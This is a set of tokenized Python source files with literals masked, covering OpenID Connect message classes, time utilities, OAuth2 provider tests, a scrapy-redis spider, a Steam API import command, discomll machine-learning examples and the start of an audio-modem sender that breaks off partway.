False , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" ] } <EOL> def verify ( self , ** kwargs ) : <EOL> super ( ProviderConfigurationResponse , self ) . verify ( ** kwargs ) <EOL> if "<STR_LIT>" in self : <EOL> assert "<STR_LIT>" in self [ "<STR_LIT>" ] <EOL> for scope in self [ "<STR_LIT>" ] : <EOL> check_char_set ( scope , SCOPE_CHARSET ) <EOL> parts = urlparse ( self [ "<STR_LIT>" ] ) <EOL> try : <EOL> assert parts . scheme == "<STR_LIT>" <EOL> except AssertionError : <EOL> raise SchemeError ( "<STR_LIT>" ) <EOL> assert not parts . query and not parts . fragment <EOL> return True <EOL> class AuthnToken ( Message ) : <EOL> c_param = { <EOL> "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT>" : REQUIRED_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT>" : SINGLE_REQUIRED_INT , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_INT , <EOL> } <EOL> class JasonWebToken ( Message ) : <EOL> c_param = { <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_INT , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_INT , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_INT , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> } <EOL> def jwt_deser ( val , sformat = "<STR_LIT>" ) : <EOL> if sformat == "<STR_LIT>" : <EOL> sformat = "<STR_LIT>" <EOL> if sformat in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if not isinstance ( val , six . string_types ) : <EOL> val = json . dumps ( val ) <EOL> sformat = "<STR_LIT>" <EOL> return JasonWebToken ( ) . deserialize ( val , sformat ) <EOL> SINGLE_OPTIONAL_JWT = ( Message , False , msg_ser , jwt_deser , False ) <EOL> class UserInfoErrorResponse ( message . ErrorResponse ) : <EOL> c_allowed_values = { "<STR_LIT:error>" : [ "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] } <EOL> class DiscoveryRequest ( Message ) : <EOL> c_param = { "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT>" : SINGLE_REQUIRED_STRING } <EOL> class DiscoveryResponse ( Message ) : <EOL> c_param = { "<STR_LIT>" : REQUIRED_LIST_OF_STRINGS } <EOL> class ResourceRequest ( Message ) : <EOL> c_param = { "<STR_LIT>" : SINGLE_OPTIONAL_STRING } <EOL> SCOPE2CLAIMS = { <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT:name>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] , <EOL> "<STR_LIT:email>" : [ "<STR_LIT:email>" , "<STR_LIT>" ] , <EOL> "<STR_LIT:address>" : [ "<STR_LIT:address>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ ] <EOL> } <EOL> MSG = { <EOL> "<STR_LIT>" : RefreshAccessTokenRequest , <EOL> "<STR_LIT>" : TokenErrorResponse , <EOL> "<STR_LIT>" : AccessTokenResponse , <EOL> "<STR_LIT>" : UserInfoRequest , <EOL> "<STR_LIT>" : AuthorizationResponse , <EOL> "<STR_LIT>" : AuthorizationErrorResponse , <EOL> "<STR_LIT>" : AuthorizationRequest , <EOL> "<STR_LIT>" : AccessTokenRequest , <EOL> "<STR_LIT>" : AddressClaim , <EOL> "<STR_LIT>" : OpenIDSchema , <EOL> "<STR_LIT>" : RegistrationRequest , <EOL> "<STR_LIT>" : RegistrationResponse , <EOL> "<STR_LIT>" : ClientRegistrationErrorResponse , <EOL> "<STR_LIT>" : IdToken , <EOL> "<STR_LIT>" : RefreshSessionRequest , <EOL> "<STR_LIT>" : RefreshSessionResponse , <EOL> "<STR_LIT>" : CheckSessionRequest , <EOL> "<STR_LIT>" : CheckIDRequest , <EOL> "<STR_LIT>" : EndSessionRequest , <EOL> "<STR_LIT>" : EndSessionResponse , <EOL> "<STR_LIT>" : Claims , <EOL> "<STR_LIT>" : OpenIDRequest , <EOL> "<STR_LIT>" : ProviderConfigurationResponse , <EOL> "<STR_LIT>" : AuthnToken , <EOL> "<STR_LIT>" : UserInfoErrorResponse , <EOL> "<STR_LIT>" : DiscoveryRequest , <EOL> "<STR_LIT>" : DiscoveryResponse , <EOL> "<STR_LIT>" : ResourceRequest , <EOL> } <EOL> def factory ( msgtype ) : <EOL> for name , obj in inspect . getmembers ( sys . modules [ __name__ ] ) : <EOL> if inspect . isclass ( obj ) and issubclass ( obj , Message ) : <EOL> try : <EOL> if obj . __name__ == msgtype : <EOL> return obj <EOL> except AttributeError : <EOL> pass <EOL> return message . factory ( msgtype ) </s>
<s> """<STR_LIT>""" <EOL> import calendar <EOL> import sys <EOL> import time <EOL> from datetime import datetime <EOL> from datetime import timedelta <EOL> import re <EOL> try : <EOL> from past . builtins import basestring <EOL> except ImportError : <EOL> pass <EOL> TIME_FORMAT = "<STR_LIT>" <EOL> TIME_FORMAT_WITH_FRAGMENT = re . compile ( <EOL> "<STR_LIT>" ) <EOL> class TimeUtilError ( Exception ) : <EOL> pass <EOL> def f_quotient ( arg0 , arg1 , arg2 = <NUM_LIT:0> ) : <EOL> if arg2 : <EOL> return int ( ( arg0 - arg1 ) // ( arg2 - arg1 ) ) <EOL> elif not arg0 : <EOL> return <NUM_LIT:0> <EOL> else : <EOL> return int ( arg0 // arg1 ) <EOL> def modulo ( arg0 , arg1 , arg2 = <NUM_LIT:0> ) : <EOL> if arg2 : <EOL> return ( ( arg0 - arg1 ) % ( arg2 - arg1 ) ) + arg1 <EOL> else : <EOL> return arg0 % arg1 <EOL> def maximum_day_in_month_for ( year , month ) : <EOL> return calendar . monthrange ( year , month ) [ <NUM_LIT:1> ] <EOL> D_FORMAT = [ <EOL> ( "<STR_LIT:Y>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT:M>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT:D>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT:T>" , None ) , <EOL> ( "<STR_LIT:H>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT:M>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT:S>" , "<STR_LIT>" ) <EOL> ] <EOL> def parse_duration ( duration ) : <EOL> index = <NUM_LIT:0> <EOL> if duration [ <NUM_LIT:0> ] == '<STR_LIT:->' : <EOL> sign = '<STR_LIT:->' <EOL> index += <NUM_LIT:1> <EOL> else : <EOL> sign = '<STR_LIT:+>' <EOL> assert duration [ index ] == "<STR_LIT:P>" <EOL> index += <NUM_LIT:1> <EOL> dic = dict ( [ ( typ , <NUM_LIT:0> ) for ( code , typ ) in D_FORMAT ] ) <EOL> for code , typ in D_FORMAT : <EOL> if duration [ index ] == '<STR_LIT:->' : <EOL> raise TimeUtilError ( "<STR_LIT>" ) <EOL> if code == "<STR_LIT:T>" : <EOL> if duration [ index ] == "<STR_LIT:T>" : <EOL> index += <NUM_LIT:1> <EOL> if index == len ( duration ) : <EOL> raise TimeUtilError ( "<STR_LIT>" ) <EOL> else : <EOL> raise TimeUtilError ( "<STR_LIT>" ) <EOL> else : <EOL> try : <EOL> mod = duration [ index : ] . index ( code ) <EOL> try : <EOL> dic [ typ ] = int ( duration [ index : index + mod ] ) <EOL> except ValueError : <EOL> if code == "<STR_LIT:S>" : <EOL> try : <EOL> dic [ typ ] = float ( duration [ index : index + mod ] ) <EOL> except ValueError : <EOL> raise TimeUtilError ( "<STR_LIT>" ) <EOL> else : <EOL> raise TimeUtilError ( <EOL> "<STR_LIT>" ) <EOL> index = mod + index + <NUM_LIT:1> <EOL> except ValueError : <EOL> dic [ typ ] = <NUM_LIT:0> <EOL> if index == len ( duration ) : <EOL> break <EOL> return sign , dic <EOL> def add_duration ( tid , duration ) : <EOL> ( sign , dur ) = parse_duration ( duration ) <EOL> if sign == '<STR_LIT:+>' : <EOL> temp = tid . tm_mon + dur [ "<STR_LIT>" ] <EOL> month = modulo ( temp , <NUM_LIT:1> , <NUM_LIT> ) <EOL> carry = f_quotient ( temp , <NUM_LIT:1> , <NUM_LIT> ) <EOL> year = tid . tm_year + dur [ "<STR_LIT>" ] + carry <EOL> temp = tid . tm_sec + dur [ "<STR_LIT>" ] <EOL> secs = modulo ( temp , <NUM_LIT> ) <EOL> carry = f_quotient ( temp , <NUM_LIT> ) <EOL> temp = tid . tm_min + dur [ "<STR_LIT>" ] + carry <EOL> minutes = modulo ( temp , <NUM_LIT> ) <EOL> carry = f_quotient ( temp , <NUM_LIT> ) <EOL> temp = tid . tm_hour + dur [ "<STR_LIT>" ] + carry <EOL> hour = modulo ( temp , <NUM_LIT> ) <EOL> carry = f_quotient ( temp , <NUM_LIT> ) <EOL> if dur [ "<STR_LIT>" ] > maximum_day_in_month_for ( year , month ) : <EOL> temp_days = maximum_day_in_month_for ( year , month ) <EOL> elif dur [ "<STR_LIT>" ] < <NUM_LIT:1> : <EOL> temp_days = <NUM_LIT:1> <EOL> else : <EOL> temp_days = dur [ "<STR_LIT>" ] <EOL> days = temp_days + tid . tm_mday + carry <EOL> while True : <EOL> if days < <NUM_LIT:1> : <EOL> pass <EOL> elif days > maximum_day_in_month_for ( year , month ) : <EOL> days -= maximum_day_in_month_for ( year , month ) <EOL> carry = <NUM_LIT:1> <EOL> else : <EOL> break <EOL> temp = month + carry <EOL> month = modulo ( temp , <NUM_LIT:1> , <NUM_LIT> ) <EOL> year += f_quotient ( temp , <NUM_LIT:1> , <NUM_LIT> ) <EOL> return time . localtime ( time . mktime ( ( year , month , days , hour , minutes , <EOL> secs , <NUM_LIT:0> , <NUM_LIT:0> , - <NUM_LIT:1> ) ) ) <EOL> else : <EOL> pass <EOL> def time_in_a_while ( days = <NUM_LIT:0> , seconds = <NUM_LIT:0> , microseconds = <NUM_LIT:0> , milliseconds = <NUM_LIT:0> , <EOL> minutes = <NUM_LIT:0> , hours = <NUM_LIT:0> , weeks = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> delta = timedelta ( days , seconds , microseconds , milliseconds , <EOL> minutes , hours , weeks ) <EOL> return datetime . utcnow ( ) + delta <EOL> def time_a_while_ago ( days = <NUM_LIT:0> , seconds = <NUM_LIT:0> , microseconds = <NUM_LIT:0> , milliseconds = <NUM_LIT:0> , <EOL> minutes = <NUM_LIT:0> , hours = <NUM_LIT:0> , weeks = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> delta = timedelta ( days , seconds , microseconds , milliseconds , <EOL> minutes , hours , weeks ) <EOL> return datetime . utcnow ( ) - delta <EOL> def in_a_while ( days = <NUM_LIT:0> , seconds = <NUM_LIT:0> , microseconds = <NUM_LIT:0> , milliseconds = <NUM_LIT:0> , <EOL> minutes = <NUM_LIT:0> , hours = <NUM_LIT:0> , weeks = <NUM_LIT:0> , time_format = TIME_FORMAT ) : <EOL> """<STR_LIT>""" <EOL> if not time_format : <EOL> time_format = TIME_FORMAT <EOL> return time_in_a_while ( days , seconds , microseconds , milliseconds , <EOL> minutes , hours , weeks ) . strftime ( time_format ) <EOL> def a_while_ago ( days = <NUM_LIT:0> , seconds = <NUM_LIT:0> , microseconds = <NUM_LIT:0> , milliseconds = <NUM_LIT:0> , <EOL> minutes = <NUM_LIT:0> , hours = <NUM_LIT:0> , weeks = <NUM_LIT:0> , time_format = TIME_FORMAT ) : <EOL> """<STR_LIT>""" <EOL> return time_a_while_ago ( days , seconds , microseconds , milliseconds , <EOL> minutes , hours , weeks ) . strftime ( time_format ) <EOL> def shift_time ( dtime , shift ) : <EOL> """<STR_LIT>""" <EOL> return dtime + timedelta ( seconds = shift ) <EOL> def str_to_time ( timestr , time_format = TIME_FORMAT ) : <EOL> """<STR_LIT>""" <EOL> if not timestr : <EOL> return <NUM_LIT:0> <EOL> try : <EOL> then = time . strptime ( timestr , time_format ) <EOL> except ValueError : <EOL> try : <EOL> elem = TIME_FORMAT_WITH_FRAGMENT . match ( timestr ) <EOL> except Exception as exc : <EOL> print >> sys . stderr , "<STR_LIT>" % ( exc , timestr ) <EOL> raise <EOL> then = time . strptime ( elem . groups ( ) [ <NUM_LIT:0> ] + "<STR_LIT>" , TIME_FORMAT ) <EOL> return time . gmtime ( calendar . timegm ( then ) ) <EOL> def instant ( time_format = TIME_FORMAT ) : <EOL> return time . strftime ( time_format , time . gmtime ( ) ) <EOL> def before ( point ) : <EOL> """<STR_LIT>""" <EOL> if not point : <EOL> return True <EOL> if isinstance ( point , basestring ) : <EOL> point = str_to_time ( point ) <EOL> elif isinstance ( point , int ) : <EOL> point = time . gmtime ( point ) <EOL> return time . gmtime ( ) < point <EOL> def after ( point ) : <EOL> """<STR_LIT>""" <EOL> if not point : <EOL> return True <EOL> else : <EOL> return not before ( point ) <EOL> not_before = after <EOL> not_on_or_after = before <EOL> valid = before <EOL> def later_than ( after , before ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( after , basestring ) : <EOL> after = str_to_time ( after ) <EOL> elif isinstance ( after , int ) : <EOL> after = time . gmtime ( after ) <EOL> if isinstance ( before , basestring ) : <EOL> before = str_to_time ( before ) <EOL> elif isinstance ( before , int ) : <EOL> before = time . gmtime ( before ) <EOL> return after >= before <EOL> def utc_time_sans_frac ( ) : <EOL> return int ( ( datetime . utcnow ( ) - datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) ) . total_seconds ( ) ) <EOL> def time_sans_frac ( ) : <EOL> return int ( "<STR_LIT>" % time . time ( ) ) <EOL> def epoch_in_a_while ( days = <NUM_LIT:0> , seconds = <NUM_LIT:0> , microseconds = <NUM_LIT:0> , milliseconds = <NUM_LIT:0> , <EOL> minutes = <NUM_LIT:0> , hours = <NUM_LIT:0> , weeks = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> dt = time_in_a_while ( days , seconds , microseconds , milliseconds , minutes , <EOL> hours , weeks ) <EOL> return int ( ( dt - datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) ) . total_seconds ( ) ) </s>
<s> import json <EOL> import time <EOL> import pytest <EOL> import six <EOL> from future . backports . urllib . parse import urlparse <EOL> from future . backports . urllib . parse import parse_qs <EOL> from oic . oauth2 . message import AuthorizationRequest <EOL> from oic . oauth2 . message import AuthorizationResponse <EOL> from oic . oauth2 . message import AccessTokenRequest <EOL> from oic . oauth2 . message import AccessTokenResponse <EOL> from oic . oauth2 . message import TokenErrorResponse <EOL> from oic . oauth2 . consumer import Consumer <EOL> from oic . oauth2 . provider import Provider <EOL> from oic . utils . authn . authn_context import AuthnBroker <EOL> from oic . utils . authn . client import verify_client <EOL> from oic . utils . authn . user import UserAuthnMethod <EOL> from oic . utils . authz import Implicit <EOL> from oic . utils import sdb <EOL> CLIENT_CONFIG = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> CONSUMER_CONFIG = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:code>" , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : "<STR_LIT:code>" , <EOL> } <EOL> ISSUER = "<STR_LIT>" <EOL> SERVER_INFO = { <EOL> "<STR_LIT:version>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ISSUER , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT:code>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> } <EOL> CDB = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:password>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> '<STR_LIT>' : [ '<STR_LIT:code>' , '<STR_LIT>' ] <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ ( "<STR_LIT>" , None ) ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT:code>' , '<STR_LIT>' ] <EOL> } <EOL> } <EOL> def _eq ( l1 , l2 ) : <EOL> return set ( l1 ) == set ( l2 ) <EOL> class DummyAuthn ( UserAuthnMethod ) : <EOL> def __init__ ( self , srv , user ) : <EOL> UserAuthnMethod . __init__ ( self , srv ) <EOL> self . user = user <EOL> def authenticated_as ( self , cookie = None , ** kwargs ) : <EOL> return { "<STR_LIT>" : self . user } , time . time ( ) <EOL> AUTHN_BROKER = AuthnBroker ( ) <EOL> AUTHN_BROKER . add ( "<STR_LIT>" , DummyAuthn ( None , "<STR_LIT:username>" ) ) <EOL> AUTHZ = Implicit ( ) <EOL> class TestProvider ( object ) : <EOL> @ pytest . fixture ( autouse = True ) <EOL> def create_provider ( self ) : <EOL> self . provider = Provider ( "<STR_LIT>" , <EOL> sdb . SessionDB ( ISSUER ) , CDB , <EOL> AUTHN_BROKER , AUTHZ , verify_client , <EOL> baseurl = '<STR_LIT>' ) <EOL> def test_init ( self ) : <EOL> provider = Provider ( "<STR_LIT>" , sdb . SessionDB ( ISSUER ) , <EOL> CDB , <EOL> AUTHN_BROKER , AUTHZ , verify_client ) <EOL> assert provider <EOL> provider = Provider ( "<STR_LIT>" , sdb . SessionDB ( ISSUER ) , <EOL> CDB , <EOL> AUTHN_BROKER , AUTHZ , verify_client , <EOL> urlmap = { "<STR_LIT>" : [ "<STR_LIT>" ] } ) <EOL> assert provider . urlmap [ "<STR_LIT>" ] == [ "<STR_LIT>" ] <EOL> def test_authorization_endpoint_faulty_redirect_uri ( self ) : <EOL> bib = { "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> "<STR_LIT:state>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT:code>" ] , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> arq = AuthorizationRequest ( ** bib ) <EOL> resp = self . provider . authorization_endpoint ( request = arq . to_urlencoded ( ) ) <EOL> assert resp . status == "<STR_LIT>" <EOL> msg = json . loads ( resp . message ) <EOL> assert msg [ "<STR_LIT:error>" ] == "<STR_LIT>" <EOL> def test_authenticated ( self ) : <EOL> _session_db = { } <EOL> cons = Consumer ( _session_db , client_config = CLIENT_CONFIG , <EOL> server_info = SERVER_INFO , ** CONSUMER_CONFIG ) <EOL> sid , location = cons . begin ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> resp = self . provider . authorization_endpoint ( urlparse ( location ) . query ) <EOL> assert resp . status == "<STR_LIT>" <EOL> resp = urlparse ( resp . message ) . query <EOL> aresp = cons . handle_authorization_response ( query = resp ) <EOL> assert isinstance ( aresp , AuthorizationResponse ) <EOL> assert _eq ( aresp . keys ( ) , [ '<STR_LIT:state>' , '<STR_LIT:code>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert _eq ( cons . grant [ sid ] . keys ( ) , [ '<STR_LIT>' , '<STR_LIT:code>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> def test_authenticated_token ( self ) : <EOL> _session_db = { } <EOL> cons = Consumer ( _session_db , client_config = CLIENT_CONFIG , <EOL> server_info = SERVER_INFO , ** CONSUMER_CONFIG ) <EOL> sid , location = cons . begin ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> QUERY_STRING = location . split ( "<STR_LIT:?>" ) [ <NUM_LIT:1> ] <EOL> resp = self . provider . authorization_endpoint ( QUERY_STRING ) <EOL> auth_resp = parse_qs ( urlparse ( resp . message ) . fragment ) <EOL> assert "<STR_LIT>" in auth_resp <EOL> assert auth_resp [ "<STR_LIT>" ] [ <NUM_LIT:0> ] == "<STR_LIT>" <EOL> def test_token_endpoint ( self ) : <EOL> authreq = AuthorizationRequest ( state = "<STR_LIT:state>" , <EOL> redirect_uri = "<STR_LIT>" , <EOL> client_id = "<STR_LIT>" ) <EOL> _sdb = self . provider . sdb <EOL> sid = _sdb . access_token . key ( user = "<STR_LIT>" , areq = authreq ) <EOL> access_grant = _sdb . access_token ( sid = sid ) <EOL> _sdb [ sid ] = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:code>" : access_grant , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> areq = AccessTokenRequest ( code = access_grant , <EOL> redirect_uri = "<STR_LIT>" , <EOL> client_id = "<STR_LIT>" , <EOL> client_secret = "<STR_LIT>" , <EOL> grant_type = '<STR_LIT>' ) <EOL> resp = self . provider . token_endpoint ( request = areq . to_urlencoded ( ) ) <EOL> atr = AccessTokenResponse ( ) . deserialize ( resp . message , "<STR_LIT>" ) <EOL> assert _eq ( atr . keys ( ) , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_token_endpoint_unauth ( self ) : <EOL> authreq = AuthorizationRequest ( state = "<STR_LIT:state>" , <EOL> redirect_uri = "<STR_LIT>" , <EOL> client_id = "<STR_LIT>" ) <EOL> _sdb = self . provider . sdb <EOL> sid = _sdb . access_token . key ( user = "<STR_LIT>" , areq = authreq ) <EOL> access_grant = _sdb . access_token ( sid = sid ) <EOL> _sdb [ sid ] = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:code>" : access_grant , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> areq = AccessTokenRequest ( code = access_grant , <EOL> redirect_uri = "<STR_LIT>" , <EOL> client_id = "<STR_LIT>" , <EOL> client_secret = "<STR_LIT>" , <EOL> grant_type = '<STR_LIT>' ) <EOL> resp = self . provider . token_endpoint ( request = areq . to_urlencoded ( ) ) <EOL> atr = TokenErrorResponse ( ) . deserialize ( resp . message , "<STR_LIT>" ) <EOL> assert _eq ( atr . keys ( ) , [ '<STR_LIT>' , '<STR_LIT:error>' ] ) </s>
<s> from scrapy_redis . spiders import RedisSpider <EOL> from example . items import ExampleLoader <EOL> class MySpider ( RedisSpider ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> redis_key = '<STR_LIT>' <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> domain = kwargs . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . alowed_domains = filter ( None , domain . split ( '<STR_LIT:U+002C>' ) ) <EOL> super ( MySpider , self ) . __init__ ( * args , ** kwargs ) <EOL> def parse ( self , response ) : <EOL> el = ExampleLoader ( response = response ) <EOL> el . add_xpath ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> el . add_value ( '<STR_LIT:url>' , response . url ) <EOL> return el . load_item ( ) </s>
<s> from django . conf import settings <EOL> from django . core . management . base import BaseCommand , CommandError <EOL> from dotastats . models import Heroes <EOL> import simplejson as json <EOL> import urllib <EOL> import urllib2 <EOL> API_KEY = settings . STEAM_API_KEY <EOL> HEROES_URL = '<STR_LIT>' <EOL> class Command ( BaseCommand ) : <EOL> args = '<STR_LIT>' <EOL> help = '<STR_LIT>' <EOL> def handle ( self , * args , ** options ) : <EOL> try : <EOL> hero_list = [ ] <EOL> kargs = dict ( { '<STR_LIT:key>' : API_KEY , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> url_data = urllib . urlencode ( kargs ) <EOL> response = urllib2 . urlopen ( HEROES_URL + '<STR_LIT:?>' + url_data ) <EOL> json_data = json . loads ( response . read ( ) ) [ '<STR_LIT:result>' ] <EOL> response . close ( ) <EOL> for hero in json_data [ '<STR_LIT>' ] : <EOL> hero_list . append ( Heroes ( hero_id = hero [ '<STR_LIT:id>' ] , <EOL> client_name = hero [ '<STR_LIT:name>' ] , <EOL> dota2_name = hero [ '<STR_LIT>' ] , <EOL> ) ) <EOL> if len ( hero_list ) == <NUM_LIT:0> : <EOL> raise CommandError ( "<STR_LIT>" ) <EOL> Heroes . objects . bulk_create ( hero_list ) <EOL> self . stdout . write ( '<STR_LIT>' ) <EOL> except urllib2 . HTTPError , e : <EOL> if e . code == <NUM_LIT> : <EOL> json_data . update ( { '<STR_LIT:error>' : '<STR_LIT>' } ) <EOL> elif e . code == <NUM_LIT> : <EOL> json_data . update ( { '<STR_LIT:error>' : '<STR_LIT>' } ) <EOL> elif e . code == <NUM_LIT> : <EOL> json_data . update ( { '<STR_LIT:error>' : '<STR_LIT>' } ) <EOL> else : <EOL> json_data . update ( { '<STR_LIT:error>' : '<STR_LIT>' + e . code } ) <EOL> return </s>
<s> from discomll import dataset <EOL> from discomll . ensemble import distributed_random_forest <EOL> train = dataset . Data ( data_tag = [ "<STR_LIT>" , <EOL> "<STR_LIT>" ] , <EOL> X_indices = range ( <NUM_LIT:2> , <NUM_LIT:20> ) , <EOL> data_type = "<STR_LIT>" , <EOL> generate_urls = True , <EOL> id_index = <NUM_LIT:0> , <EOL> y_index = <NUM_LIT:1> , <EOL> X_meta = [ "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:c>" , "<STR_LIT:c>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:c>" ] , <EOL> delimiter = "<STR_LIT:U+002C>" ) <EOL> test = dataset . Data ( data_tag = [ "<STR_LIT>" , <EOL> "<STR_LIT>" ] , <EOL> data_type = "<STR_LIT>" , <EOL> generate_urls = True , <EOL> X_indices = range ( <NUM_LIT:2> , <NUM_LIT:20> ) , <EOL> id_index = <NUM_LIT:0> , <EOL> y_index = <NUM_LIT:1> , <EOL> X_meta = [ "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:c>" , "<STR_LIT:c>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:d>" , "<STR_LIT:c>" ] , <EOL> delimiter = "<STR_LIT:U+002C>" ) <EOL> fit_model = distributed_random_forest . fit ( train , trees_per_chunk = <NUM_LIT:3> , max_tree_nodes = <NUM_LIT:50> , min_samples_leaf = <NUM_LIT:10> , <EOL> min_samples_split = <NUM_LIT:5> , class_majority = <NUM_LIT:1> , measure = "<STR_LIT>" , accuracy = <NUM_LIT:1> , <EOL> separate_max = True , random_state = None , save_results = True ) <EOL> predict_url = distributed_random_forest . predict ( test , fit_model ) <EOL> print predict_url </s>
<s> from disco . core import result_iterator <EOL> from discomll import dataset <EOL> from discomll . regression import linear_regression <EOL> from discomll . utils import model_view <EOL> train = dataset . Data ( data_tag = [ "<STR_LIT>" ] , <EOL> data_type = "<STR_LIT>" , <EOL> X_indices = [ <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> y_index = <NUM_LIT:2> ) <EOL> test = dataset . Data ( data_tag = [ "<STR_LIT>" ] , <EOL> data_type = "<STR_LIT>" , <EOL> X_indices = [ <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> y_index = <NUM_LIT:2> ) <EOL> fit_model = linear_regression . fit ( train ) <EOL> model = model_view . output_model ( fit_model ) <EOL> print model <EOL> predictions = linear_regression . predict ( test , fit_model ) <EOL> for k , v in result_iterator ( predictions ) : <EOL> print k , v [ <NUM_LIT:0> ] </s>
<s> import numpy as np <EOL> import logging <EOL> import itertools <EOL> from . import send as _send <EOL> from . import recv as _recv <EOL> from . import framing , common , stream , detect , sampling <EOL> log = logging . getLogger ( __name__ ) <EOL> def send ( config , src , dst , gain = <NUM_LIT:1.0> ) : <EOL> sender = _send . Sender ( dst , config = config , gain = gain ) <EOL> Fs = config . Fs <EOL> sender . write ( np . zeros ( int ( Fs * config . silence_start ) ) ) <EOL> sender . start ( ) <EOL> training_duration = sender . offset <EOL> log . info ( '<STR_LIT>' , training_duration / Fs ) <EOL> reader = stream . Reader ( src , eof = True ) <EOL> data = itertools . chain . from_iterable ( reader ) <EOL> bits = framing . encode ( data ) <EOL> log . info ( '<STR_LIT>' ) <EOL> sender . modulate ( bits = bits ) <EOL> data_duration = sender . offset - training_duration <EOL> log . info ( '<STR_LIT>' , <EOL> reader . total / <NUM_LIT> , data_duration / Fs 